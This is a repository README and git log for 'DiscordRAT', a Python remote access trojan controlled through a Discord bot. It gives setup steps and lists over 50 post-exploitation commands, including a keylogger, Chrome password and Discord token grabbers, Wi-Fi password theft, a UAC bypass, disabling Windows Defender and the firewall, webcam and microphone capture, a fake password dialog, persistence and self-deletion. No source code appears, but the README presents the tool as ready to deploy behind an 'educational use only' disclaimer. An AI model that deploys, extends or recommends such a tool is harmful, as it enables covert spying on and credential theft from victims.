======================: FILES :======================
======================: README CONTENT :======================
# DiscordRAT
Discord Remote Administration Tool fully written in Python3.

This is a RAT controlled over Discord with over 50 post exploitation modules.

Please use the 2.0 version\
https://github.com/moom825/Discord-RAT-2.0
## **Disclaimer:**

This tool is for educational use only, the author will not be held responsible for any misuse of this tool.

## **Credits**
This project was originally made by https://github.com/Sp00p64/DiscordRAT, this entire readme.md is made by him too.\
Credit goes to him for all the original modules and readme.md

## **Setup Guide:**
You will first need to register a bot with the Discord developer portal and then add the bot to the Discord server that you want to use to control the bot (make sure the bot has administrator privileges in the Discord server).
Once the bot is created copy the token of your bot and paste it at line 20.

Install requirements :
```
pip3 install -r requirements.txt
```
Then if the steps above were successful, you can launch the python file by executing ```python DiscordRAT.py```. It will create a new channel and post a message on the server with a generated session number.\
Now your bot should be available to use ! 

**Requirements:**\
Python3, Windows(x64)

## **Modules**
```
Available commands are :
--> !message = Show a message box displaying your text / Syntax  = "!message example"
--> !shell = Execute a shell command /Syntax  = "!shell whoami"
--> !webcampic = Take a picture from the webcam
--> !windowstart = Start logging current user window (logging is shown in the bot activity)
--> !windowstop = Stop logging current user window 
--> !voice = Make a voice say outloud a custom sentence / Syntax = "!voice test"
--> !admincheck = Check if program has admin privileges
--> !sysinfo = Gives info about infected computer
--> !history = Get chrome browser history
--> !download = Download a file from infected computer
--> !upload = Upload file to infected computer / Syntax = "!upload file.png" (with attachment)
--> !cd = Changes directory
--> !delete = deletes a file / Syntax = "!delete /path to/the/file.txt"
--> !write = Type your desired sentence on computer / Type "enter" to press the enter button on the computer
--> !wallpaper = Change infected computer wallpaper / Syntax = "!wallpaper" (with attachment)
--> !clipboard = Retrieve infected computer clipboard content
--> !geolocate = Geolocate computer using latitude and longitude of the ip adress with google map / Warning : Geolocating IP adresses is not very precise
--> !startkeylogger = Starts a keylogger
--> !stopkeylogger = Stops keylogger
--> !dumpkeylogger = Dumps the keylog
--> !volumemax = Put volume to max
--> !volumezero = Put volume at 0
--> !idletime = Get the idle time of user's on target computer
--> !blockinput = Blocks user's keyboard and mouse / Warning : Admin rights are required
--> !unblockinput = Unblocks user's keyboard and mouse / Warning : Admin rights are required
--> !screenshot = Get the screenshot of the user's current screen
--> !exit = Exit program
--> !kill = Kill a session or all sessions / Syntax = "!kill session-3" or "!kill all"
--> !uacbypass = attempt to bypass uac to gain admin by using fod helper
--> !passwords = grab all chrome passwords
--> !streamwebcam = streams webcam by sending multiple pictures
--> !stopwebcam = stop webcam stream
--> !getdiscordinfo = get discord token,email,phone number,etc
--> !streamscreen = stream screen by sending multiple pictures
--> !stopscreen = stop screen stream
--> !shutdown = shutdown computer
--> !restart = restart computer
--> !logoff = log off current user
--> !bluescreen = BlueScreen PC
--> !displaydir = display all items in current dir
--> !currentdir = display the current dir
--> !dateandtime = display system date and time
--> !prockill = kill a process by name / syntax = "!kill process.exe"
--> !recscreen = record screen for certain amount of time / syntax = "!recscreen 10"
--> !reccam = record camera for certain amount of time / syntax = "!reccam 10"
--> !recaudio = record audio for certain amount of time / syntax = "!recaudio 10"
--> !disableantivirus = permanently disable windows defender(requires admin)
--> !disablefirewall = disable windows firewall (requires admin)
--> !audio = play a audio file on the target computer(.wav only) / Syntax = "!audio" (with attachment)
--> !selfdestruct = delete all traces that this program was on the target PC
--> !windowspass = attempt to phish password by poping up a password dialog
--> !displayoff = turn off the monitor(Admin rights are required)
--> !displayon = turn on the monitors(Admin rights are required)
--> !hide = hide the file by changing the attribute to hidden
--> !unhide = unhide the file the removing the attribute to make it unhidden
--> !ejectcd = eject the cd drive on computer
--> !retractcd = retract the cd drive on the computer
--> !critproc = make program a critical process. meaning if its closed the computer will bluescreen(Admin rights are required)
--> !uncritproc = if the process is a critical process it will no longer be a critical process meaning it can be closed without bluescreening(Admin rights are required)
--> !website = open a website on the infected computer / syntax = "!website google.com" or "!website www.google.com"
--> !distaskmgr = disable task manager(Admin rights are required)
--> !enbtaskmgr = enable task manager(if disabled)(Admin rights are required)
--> !getwifipass = get all the wifi passwords on the current device(Admin rights are required)
--> !startup = add file to startup(when computer go on this file starts)(Admin rights are required)
```
## **Advice:**
If you have problems with the installation of win32api or other modules, try installing it in a python virtual environment.\
Please avoid opening issues about module related errors as it is caused by your python installation and not a problem inherent of DiscordRAT.\
If you encounter "AttributeError: module 'enum' has no attribute 'IntFlag'" while compiling to Pyinstaller please do :
```
pip uninstall enum34
```

## **Contact:**
Feel free to contact me if you have any problems.
I also make custom version of this tool (not anymore), so if you want something added feel free to ask by joining by discord server.
https://discord.gg/cKwkkC2U4c.
====================== GIT HISTORY: ======================
74e6556 HEAD@{0}: clone: from https://github.com/moom825/Discord-RAT
commit 74e65565486e7844b5c8613850de86b947dd2f19
Author: moom825 <63253634+moom825@users.noreply.github.com>
Date:   Sun Nov 20 18:49:28 2022 -0500

    new discord link

commit 00e692c4e052f321dbb6492ebee7afb79cd24ef3
Author: moom825 <63253634+moom825@users.noreply.github.com>
Date:   Sun Jul 17 21:23:55 2022 -0400

    Update README.md

commit edf39935936516df5412f5054b8642928efdc7c7
Author: moom825 <63253634+moom825@users.noreply.github.com>
Date:   Sat Jul 16 00:25:11 2022 -0400

    i never want to work on this again 2

commit 61879c4870a71639c96fda90d8f6681c41eefb95
Author: moom825 <63253634+moom825@users.noreply.github.com>
Date:   Sat Jul 16 00:16:23 2022 -0400

    i never want to work on this again

commit 255c22d31b30b1c8a4c0fa9d9967dfcbf381f01d
Author: moom825 <63253634+moom825@users.noreply.github.com>
Date:   Sat Jul 16 00:09:06 2022 -0400

    Update requirements.txt

commit bc64ae1fd59920dd1c5d2ca2e4d47b9c8eccda10
Author: moom825 <63253634+moom825@users.noreply.github.com>
Date:   Fri May 6 19:37:58 2022 -0400

    fixed spelling error

commit 292a21968f1f082e99bd70ae949d3efbde30cc23
Author: moom825 <63253634+moom825@users.noreply.github.com>
Date:   Fri May 6 19:37:27 2022 -0400

    Update requirements.txt

commit 3c8ae6a85adc1fd01e12de1897c62fdb3c01ac76
Author: moom825 <63253634+moom825@users.noreply.github.com>
Date:   Fri May 6 19:34:59 2022 -0400

    added back the token grabber with token decryption

commit ff0c67486e0f2f2edf754cb83d533cd999746b83
Author: moom825 <63253634+moom825@users.noreply.github.com>
Date:   Fri May 6 19:31:36 2022 -0400

    Update DiscordRAT.py

commit fe9fbe483f783e29d7d062a555117ca0fafc52d5
Author: moom825 <63253634+moom825@users.noreply.github.com>
Date:   Fri Apr 29 16:59:06 2022 -0400

    Update README.md

commit dd496358acbd805460d93aa53a8c06e549ee58a0
Author: moom825 <63253634+moom825@users.noreply.github.com>
Date:   Wed Apr 27 20:34:54 2022 -0400

    Update README.md

commit 526aa4b0a739d3d6d59d22fde426373ff56e5ef8
Author: moom825 <63253634+moom825@users.noreply.github.com>
Date:   Mon Mar 21 20:32:02 2022 -0400

    Update DiscordRAT.py

commit b842a0a7790f217511b36d6f0ced4acf2a96953a
Author: moom825 <63253634+moom825@users.noreply.github.com>
Date:   Sun Mar 6 14:25:07 2022 -0500

    fixed passwords and other problems

commit d6b16b7a73c2fe1689fdad4ac94d8136d7a6fd65
Author: moom825 <63253634+moom825@users.noreply.github.com>
Date:   Thu Nov 4 00:20:33 2021 -0400

    Update README.md

commit 02bd7313642975a49bc1837bd7c6c875cdcf9be0
Author: moom825 <63253634+moom825@users.noreply.github.com>
Date:   Mon Nov 1 11:10:28 2021 -0400

    fixed

commit 571b937a3195632c95de052cef8494130318e9ef
Author: moom825 <63253634+moom825@users.noreply.github.com>
Date:   Mon Nov 1 10:58:12 2021 -0400

    fix file uploading issues

commit 26118280d5e4a36162adf7c71575c9b4887bba59
Author: moom825 <63253634+moom825@users.noreply.github.com>
Date:   Mon Oct 11 02:39:13 2021 -0400

    fix problem with disabling defender

commit 5fbd59016a5a0c37e2f986b0d5c9e319dac1a705
Merge: 20e0a97 ee15c91
Author: moom825 <63253634+moom825@users.noreply.github.com>
Date:   Sat Sep 4 15:41:51 2021 -0400

    Merge pull request #11 from r2fo/patch-4
    
    Update README.md

commit ee15c91bf95ec2d4a0528ec3c6494693e765cdcc
Author: Rafo <50496756+r2fo@users.noreply.github.com>
Date:   Sat Sep 4 21:39:03 2021 +0200

    Update README.md
    
    Fixed some typos and improved the text

commit 20e0a9708eec37fe8ad20e656e732c5dc8a5295a
Author: moom825 <63253634+moom825@users.noreply.github.com>
Date:   Tue Aug 24 08:49:23 2021 -0400

    fixed spelling

commit 3fbb1b991eb4c8baee5e5a771a5b22a168d77c40
Author: moom825 <63253634+moom825@users.noreply.github.com>
Date:   Thu Aug 12 15:54:04 2021 -0400

    Update README.md

commit efa494b577132fba8937ca535d8ebb39ab6c7e10
Author: moom825 <63253634+moom825@users.noreply.github.com>
Date:   Sun Aug 8 21:04:00 2021 -0400

    fix spelling error

commit ceafec3eeb5829f5819d35f3099e0b9c82c138bc
Author: moom825 <63253634+moom825@users.noreply.github.com>
Date:   Wed Aug 4 18:29:18 2021 -0400

    Update DiscordRAT.py

commit 9446ab492c22cdeff62bbb69f4db4845693cdac2
Author: moom825 <63253634+moom825@users.noreply.github.com>
Date:   Wed Aug 4 18:26:42 2021 -0400

    Update DiscordRAT.py

commit 2b5d88c994e4d80fc6a29cf0b34bc2b7c8f4f29c
Author: moom825 <63253634+moom825@users.noreply.github.com>
Date:   Sun Aug 1 14:22:07 2021 -0400

    added startup to the readme

commit 5fd033a0de9e01dd2fcb96a404c76617044ebcce
Author: moom825 <63253634+moom825@users.noreply.github.com>
Date:   Sun Aug 1 14:21:19 2021 -0400

    added startup, as well as fixed some functions

commit 4ae057c226edcfd1d9d75de52e5bc65e9c452ea6
Author: moom825 <63253634+moom825@users.noreply.github.com>
Date:   Fri Jul 30 13:04:20 2021 -0400

    Update readme

commit ab17627263037f7585a8178d8aa804a3463fee70
Author: moom825 <63253634+moom825@users.noreply.github.com>
Date:   Wed Jul 14 18:26:42 2021 -0400

    Update README.md

commit 64244a157a345ea0903e9210684e4d4f44d10148
Author: moom825 <63253634+moom825@users.noreply.github.com>
Date:   Wed Jul 14 18:26:18 2021 -0400

    Update DiscordRAT.py

commit f1b1f9527c853cd2ad12089be5b129e3034b795c
Author: moom825 <63253634+moom825@users.noreply.github.com>
Date:   Thu Jun 10 22:40:39 2021 -0400

    Update README.md

commit 8e65bcccd786f79856226db5f373ddb5ab333e97
Author: moom825 <63253634+moom825@users.noreply.github.com>
Date:   Wed Jun 9 17:32:13 2021 -0400

    Update DiscordRAT.py

commit fdc4ec39b7fd61b3cb5e746a881a1bcf9bdb4809
Author: moom825 <63253634+moom825@users.noreply.github.com>
Date:   Mon May 31 21:17:04 2021 -0400

    Update DiscordRAT.py

commit 7e83bea010ca089ed31b07ab6b5ba9340f32bf53
Author: moom825 <63253634+moom825@users.noreply.github.com>
Date:   Sat May 29 21:06:56 2021 -0400

    Update README.md

commit 1b1cd1a0ebb02ba15c984dcf6878af50ba191ae8
Author: moom825 <63253634+moom825@users.noreply.github.com>
Date:   Sat May 29 21:06:30 2021 -0400

    Update README.md

commit f6066369ac8fe186a8643e75e6b998f931139255
Author: moom825 <63253634+moom825@users.noreply.github.com>
Date:   Sat May 29 21:05:44 2021 -0400

    Update README.md

commit cf12d69a5f8b8b6cf443d8b30e8220427f24c1c9
Author: moom825 <63253634+moom825@users.noreply.github.com>
Date:   Sat May 29 21:03:48 2021 -0400

    Update DiscordRAT.py

commit f7905446c6c905c00d72ff7a0a2933d316f1ee0f
Author: moom825 <63253634+moom825@users.noreply.github.com>
Date:   Sat May 29 21:03:02 2021 -0400

    Add files via upload

commit f948dde00d6340eb8b68bae1e4ff6ed06ba2f481
Author: moom825 <63253634+moom825@users.noreply.github.com>
Date:   Sat May 29 21:02:14 2021 -0400

    Update README.md

commit b3e69333b88d006a527ab6150032e3dbebb92b03
Author: moom825 <63253634+moom825@users.noreply.github.com>
Date:   Sat May 29 20:47:13 2021 -0400

    Update README.md

commit 240f91e07203f6d9ab42bc6ebc6c5d50dba0e4fc
Author: moom825 <63253634+moom825@users.noreply.github.com>
Date:   Sat May 29 20:42:10 2021 -0400

    Initial commit
